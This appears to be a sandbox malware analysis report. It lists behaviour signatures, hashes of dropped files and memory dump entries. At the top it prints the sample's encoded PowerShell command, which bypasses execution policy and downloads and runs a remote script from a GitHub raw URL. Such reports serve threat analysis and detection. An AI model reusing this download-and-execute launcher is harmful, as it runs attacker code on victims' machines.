C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES4ED1.tmpMD5
a678d614e8a35e764b9050bb314ff4f7
SHA1c3285eb467f7d1188044ea6166f4fc92a73fc5c7
SHA2561b2e81088a1fa8c8384db05a322fbb1b32b51f6e9f6fa59d1b744439ca9d5717
SHA512b667bb3f137c54dfab58797e1b4e07cb41ad117336ac114aaaea602a58a337cb7ccf483be57fedd30265570d68739ed64c021c312d7839f53699d1f5eac3927c
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.dllMD5
0373a86ee50979377275156371cda297
SHA178b2e581b894563fc24da96ecfc2650209852fe5
SHA256a4d90d6df58daf948a813c582dd6de992de071485c8598ae83b08695be0d53dd
SHA512a8d8df43e1aa2cc2256a86e4dce4f3c31f99e27e0539ae39e7845a7a549a463ec3da8106810d6617f53f7c69118f7748e80578663bdc106fab5ab1168a13c9a5
-
\??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\CSC463BC4AF188A4A8598802B9627B669C5.TMPMD5
6c71aa2e00db33fe8c1cacff02e50b0d
SHA14cf11d0cae604e7536c5060e6e2ddcbb9b3dfb54
SHA2560d674155969fd764d7cee7518f4557b117a9b34dd8dfb8c9ec805c8a09d6ca88
SHA5124f959f55fec51e70b42a190fb0f79cbc8d75c82b92dad601bcdf64b1760de07d0e0ebf01cd3307328042dabbc348c3cdac2fe6c48ef623810fdce8afcfd2fef9
-
\??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\zoqd1035\zoqd1035.cmdlineMD5
b95881e6e1ed57c9e246c8d237110709
SHA1984310433e7e47e46033da9651c151a861965004
SHA256bced04afdb7587f18265b97a96ff1e9a7500ff2d2a50fbf51f7c9d26583f51cb
SHA5120598e898049c735e9c9f8a6c865b0389bdd1a3e00a39f5dba0f16b0a18901aa9b29032cbd84248fc04bf096f1ae2064c2a85331119336c16c1d753e52a30042d
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/8-34-0x0000000000000000-mapping.dmp
-
memory/188-4-0x00000289D15E0000-0x00000289D15E1000-memory.dmpFilesize
4KB
-
memory/188-5-0x00000289D1790000-0x00000289D1791000-memory.dmpFilesize
4KB
-
memory/188-3-0x00007FFCA0770000-0x00007FFCA115C000-memory.dmpFilesize
9.9MB
-
memory/188-2-0x0000000000000000-mapping.dmp
-
memory/188-14-0x00000289D1730000-0x00000289D1731000-memory.dmpFilesize
4KB
-
memory/636-40-0x0000000000000000-mapping.dmp
-
memory/640-41-0x0000000000000000-mapping.dmp
-
memory/740-27-0x0000000000000000-mapping.dmp
-
memory/744-10-0x0000000000000000-mapping.dmp
-
memory/744-26-0x0000000000000000-mapping.dmp
-
memory/1144-18-0x0000000000000000-mapping.dmp
-
memory/1232-19-0x0000000000000000-mapping.dmp
-
memory/1232-42-0x0000000000000000-mapping.dmp
-
memory/1404-25-0x0000000000000000-mapping.dmp
-
memory/1608-21-0x0000000000000000-mapping.dmp
-
memory/1620-46-0x00007FFCA0770000-0x00007FFCA115C000-memory.dmpFilesize
9.9MB
-
memory/1620-45-0x0000000000000000-mapping.dmp
-
memory/1720-39-0x0000000000000000-mapping.dmp
-
memory/2156-33-0x0000000000000000-mapping.dmp
-
memory/2168-32-0x0000000000000000-mapping.dmp
-
memory/2308-20-0x0000000000000000-mapping.dmp
-
memory/2372-38-0x0000000000000000-mapping.dmp
-
memory/2420-35-0x0000000000000000-mapping.dmp
-
memory/2468-15-0x0000000000000000-mapping.dmp
-
memory/2580-37-0x0000000000000000-mapping.dmp
-
memory/2664-51-0x0000000000000000-mapping.dmp
-
memory/2740-16-0x0000000000000000-mapping.dmp
-
memory/2748-17-0x0000000000000000-mapping.dmp
-
memory/2888-43-0x0000000000000000-mapping.dmp
-
memory/3012-44-0x0000000000000000-mapping.dmp
-
memory/3252-30-0x0000000000000000-mapping.dmp
-
memory/3268-31-0x0000000000000000-mapping.dmp
-
memory/3356-22-0x0000000000000000-mapping.dmp
-
memory/3436-7-0x0000000000000000-mapping.dmp
-
memory/3976-1-0x00000000018D0000-0x00000000018D1000-memory.dmpFilesize
4KB
-
memory/4016-50-0x0000000000000000-mapping.dmp
-
memory/4048-24-0x0000000000000000-mapping.dmp
-
memory/4092-36-0x0000000000000000-mapping.dmp
-
memory/4092-23-0x0000000000000000-mapping.dmp